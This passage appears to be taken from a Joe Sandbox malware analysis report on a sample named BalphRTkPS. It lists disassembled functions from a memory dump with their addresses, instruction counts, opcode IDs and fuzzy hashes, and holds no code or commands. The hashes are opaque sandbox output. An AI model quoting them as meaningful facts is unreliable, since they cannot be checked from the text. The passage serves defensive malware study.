                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 18ee5739ddea9e770d1499302252c12666848391cd86c32f74494a25af90cb75
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: B6F02E72600201AFE324DB25CC04F86F7EDEFA8300F148078AA44CB2A4FAB0EE11C694
                                                                                                              Function 017B8D20 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b824436a545cc1660b6c756787101c7a38d6c2884b1641c846da608f3c378118
                                                                                                              • Instruction ID: 3fb1c4a835cd1ceea577b6fb39b6b7fa8dd5cda5909e340b26ec875060a84498
                                                                                                              • Opcode Fuzzy Hash: b824436a545cc1660b6c756787101c7a38d6c2884b1641c846da608f3c378118
                                                                                                              • Instruction Fuzzy Hash: 6EF024328002646BD7336A1CE888BEAFB5CFBD9310F094017FD486716187306DC0CB80
                                                                                                              Function 017BC912 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47021df3ddf5808feee96c7e1af7c1f91eb6b14054404b3a6ea25ec0f225500e
                                                                                                              • Instruction ID: 49bd6962db8e8c17bcacceb5b73ff5d518751cb2bcf3a9ac5fe6a1676c72c51f
                                                                                                              • Opcode Fuzzy Hash: 47021df3ddf5808feee96c7e1af7c1f91eb6b14054404b3a6ea25ec0f225500e
                                                                                                              • Instruction Fuzzy Hash: F4F04F70A01249EFDB14EF69C555AAEF7B4FF18300F008056A955EB385DA34EA01CB51
                                                                                                              Function 017347FB Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e65788ef79d8b23a9e8f458a74736d9efb3eea80a73a9e13f205472f03c1c784
                                                                                                              • Instruction ID: 981353cc26f3a728aaecc2c2ca9b2b63798013962ae2d8c9fa700da3c8b05820
                                                                                                              • Opcode Fuzzy Hash: e65788ef79d8b23a9e8f458a74736d9efb3eea80a73a9e13f205472f03c1c784
                                                                                                              • Instruction Fuzzy Hash: A8F02E359863E08FE73BCB2CC408BA1FBC49B80730F0888AAC58B83543C320D880CA10
                                                                                                              Function 017F0115 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c5d8ad5a1069217e263e766c2005e10ee6cdd7cbe7dd11a371e3621b57cc6906
                                                                                                              • Instruction ID: 0dfde6113537a95e1e9167587057ef141793da8e1a4de0897e87c4f45ab7cd59
                                                                                                              • Opcode Fuzzy Hash: c5d8ad5a1069217e263e766c2005e10ee6cdd7cbe7dd11a371e3621b57cc6906
                                                                                                              • Instruction Fuzzy Hash: 52F0273A52A6C047CF335F2C645C2DAEF96A75A110F29144DEEA15730BD9748A83CB20
                                                                                                              Function 0176C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5dbeaae609fd1a1cd335c9caa0b8966b86d51cdc93fc7ec1a8f903e0f4410598
                                                                                                              • Instruction ID: c6e613f67a30ed32819bf21a83a04fc14dc3d4552c1f304a2df531ed8c6c2e35
                                                                                                              • Opcode Fuzzy Hash: 5dbeaae609fd1a1cd335c9caa0b8966b86d51cdc93fc7ec1a8f903e0f4410598
                                                                                                              • Instruction Fuzzy Hash: 4CF02071515A919FE333DB1CC548B21FBECAB017B0F08A866DD8AC7952C364FC80CA99
                                                                                                              Function 01772619 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 05422d008f4d59402c17883c883580d6613c9ac094e9cc92692e0ac3ac23675a
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: 49E0D8723016012BEB229E598CC4F47B76EEFD6B14F04007AB6049F256CAE2DC0982A4
                                                                                                              Function 017C6030 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: 6a4fff35c7471a1d851fca3831aeaa538626a3ab05e27afcc3e003209d4714a1
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: 28F030721042049FE3218F49D984F62F7F8EB05764F45C06DF609AB661D379EC80CBA4
                                                                                                              Function 01730710 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 8cc3a118935d5174ff54bc9afc04c4d35b4d3837be61b40fc74a44410ba2caad
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 30F06D3A2047559BEB17DF19D050AA9FBE8FB95360B0400D5F8468B352EB32E982CB94
                                                                                                              Function 017649D0 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: a22314e781bb19fce7b9d376254d7e535cb90e34fc8f0299968e9320e0eaf3a5
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: 4EE0D832244145BBD3311E698808F6EF7ADEBD4BA0F150429EA428B550DB70DD40C7E8
                                                                                                              Function 017D678E Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 463f1ec5ce9da75521086c4308b2488c85153a77b1af5f5cea9ef0f257cfb51c
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: E4E04F72A40128BBDB219B998D05F9AFEBCDBA4EB0F164055BA01EB194E670DE00D690
                                                                                                              Function 017325E0 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ef5c247b3263648d5d667f0d39439d7cc49831a4ccef38fc23ea250e4865adc1
                                                                                                              • Instruction ID: 25f70aaec2a1be4868e857ec395971e8b42e9062fe1e9981da70d7eb18b9af73
                                                                                                              • Opcode Fuzzy Hash: ef5c247b3263648d5d667f0d39439d7cc49831a4ccef38fc23ea250e4865adc1
                                                                                                              • Instruction Fuzzy Hash: E5E092321006549BC722BF29DD05F9AB79AEFA0364F114515F125575A5CB30A910C788
                                                                                                              Function 017B4000 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: e906af5edb3896e3d89c963dac7456cf950d4a1e637e325cd943048f7d5f8c02
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: 14E0C9343003058FE715CF19C080B92BBB6BFD5A10F28C0A8A94A8F206EB32E842CB40
                                                                                                              Function 0176CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fa8ce16c07ac1a25305b9be288611f20235365345bbd62948a09675b6926aa53
                                                                                                              • Instruction ID: 40b9a42997152665b7405efac621507267b27c9312bf1e9f3bffd9e50ed86953
                                                                                                              • Opcode Fuzzy Hash: fa8ce16c07ac1a25305b9be288611f20235365345bbd62948a09675b6926aa53
                                                                                                              • Instruction Fuzzy Hash: E3D02B324850306BCB77E5197C08FA7BB5DDB44360F018861FA0892015D564CD8196C4
                                                                                                              Function 0172823B Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: f396e489b5f62a07dec1306c896dd7bad65103616a8b6e92a164d57208e56590
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: C4E0C231148A30EFDB323F16DC04F62F6E1FF55B10F244869E085064B99772AC82DB59
                                                                                                              Function 01732050 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82832a2f5bb198e553d042bc62b8f0c8beee13d8ca8b653dd192ddbb32ee1cd2
                                                                                                              • Instruction ID: 1ff33a4bb5deca64fe74882c6c37216d03ecdd4e2be0ea364b47424c72b023bf
                                                                                                              • Opcode Fuzzy Hash: 82832a2f5bb198e553d042bc62b8f0c8beee13d8ca8b653dd192ddbb32ee1cd2
                                                                                                              • Instruction Fuzzy Hash: 4EE0C232100564ABC322FF5DDD00F4AB39EEFE4360F104121F155876D9CB20AD00C798
                                                                                                              Function 01768A90 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction ID: ed7548794aee32ea8befd7b0683ce1009d307cd0f55a93da6b0851528f952531
                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction Fuzzy Hash: 75E08633111B1487C728DE18D511B76B7A8EF45720F09463EAA5347780C534E544CB95
                                                                                                              Function 01786AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction ID: 54f8d335c6cc637217a0c83b2210091b6c41869745db810f529649d5f0eb42b0
                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction Fuzzy Hash: D1D05E36511A50EFC332AF1BEA04D13FBF9FBC4A207050A2EA54583A24C770A806CBA0
                                                                                                              Function 0176E59C Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: bdaeecba143da3727f462d7bcfad4ec2925339bc0bc944954098c72df5a9bd91
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: F7D0A932208620ABD732AA1CFC04FC3B3E8BB88720F060859B019C7090C360AC81CA88
                                                                                                              Function 017AE908 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: 98ec11cd43290f9696eb4f92a7a7470e8db6d5a40e31f2fed589fe5d32eef5e9
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: E4E0EC359507849BDF16EF59C644F5AFBB5BB94B40F550458A1085B665CA24A900CB40
                                                                                                              Function 0172A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: 0583c9b5c60fea8d0ce79335003a13d135851d78c9a6ee977ebb87b6c1e9c4a6
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: C8D0223221203193CB2866556804F63E915EB80AA0F2A006CB80AD3C00C5088C43C2E0
                                                                                                              Function 0176A830 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: edbbe8db903b0d68d7a6a5a60fe6d0d77bdac9bffd0a547ace30009fc649cf73
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: 5DD012371D055DBBCB11AF66DC01F957BA9E764BA0F444420B518875A0C63AE950D584
                                                                                                              Function 0176CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3987e76787e3285811a463d6928a12122f4aa4c0f7ecbef8c78f5466ab5b87a5
                                                                                                              • Instruction ID: a21811c6fefc5c6e7bd4fd4bd5a7884b071edc4696a8fbc67701f353d148c8c2
                                                                                                              • Opcode Fuzzy Hash: 3987e76787e3285811a463d6928a12122f4aa4c0f7ecbef8c78f5466ab5b87a5
                                                                                                              • Instruction Fuzzy Hash: 39D0A930601002CBDF3BDF08CA10E2EFAB8FF50641F9000ACEB4492420E328DE01CB00
                                                                                                              Function 0176C700 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: 91e0ca9c3ccf127e0074c385e5f1f823f7e72d0e8bdef0c76885acd45acf12ed
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 29C08033150644AFC711EF95CD01F0177A9F798B40F000421F30447570C631FC10D644
                                                                                                              Function 01750310 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: 3503616d8dd4f5168892c0b07d6c4a8d3b4533cc1b886396258214cf7fd5c5b9
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 91D0123610024CEFCB01DF41C890D9AB72AFBD8710F148019FD19076118A71ED62DA50
                                                                                                              Function 01730750 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 339144d1e80c19ab8bfd9a7e587b31f9f52084aed25446689298c66b8b8865fa
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: 94C04879B41A428FCF16EB2AD298F49B7E4FB44740F150890E849CBB22EB24E841CA10
                                                                                                              Function 01804DAD Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                              • Instruction ID: f9ab90bbea2c61de78b88bb7daf3cdf58be4962f0a6a9c7bbeb93e94e9f3fe99
                                                                                                              • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                              • Instruction Fuzzy Hash: 2BB01232216585CFC7026720CB04B1872A9BF017C0F0A00F0690089831DA289910E502
                                                                                                              Function 01774340 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 70ed5dc120f28b8be917022cfc11f43c9740276647927c9909fc12cc4dd9deb6
                                                                                                              • Instruction ID: 41e2b56450196392426a3d0e6987e681fe7f0aa49dfdf9b7c735d8e6a976529d
                                                                                                              • Opcode Fuzzy Hash: 70ed5dc120f28b8be917022cfc11f43c9740276647927c9909fc12cc4dd9deb6
                                                                                                              • Instruction Fuzzy Hash: F5900231649800129240715848C4546D006A7E0311B95C021E0424568CCA148B565363
                                                                                                              Function 01774650 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61a5cfe99b0a3e4bb6c49400bb527aa96208f209e7fa5a0db6776bec5a7d07d3
                                                                                                              • Instruction ID: fa589fb42e20d343070f2cf68bbd74a6c5dee36c14b8b0d0f7d60a33909efbad
                                                                                                              • Opcode Fuzzy Hash: 61a5cfe99b0a3e4bb6c49400bb527aa96208f209e7fa5a0db6776bec5a7d07d3
                                                                                                              • Instruction Fuzzy Hash: C490026164550042424071584844406F006A7E13113D5C125A0554574CC6188A55936B
                                                                                                              Function 01772BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8a66048e9c391a66bd10ceab5a8f58e33cff2ef9a93279d211838d1a4d080d7
                                                                                                              • Instruction ID: 91412e0fda296685bb1fc36c86e5c536554b671e8f563ff4c811ef9e53efbe16
                                                                                                              • Opcode Fuzzy Hash: d8a66048e9c391a66bd10ceab5a8f58e33cff2ef9a93279d211838d1a4d080d7
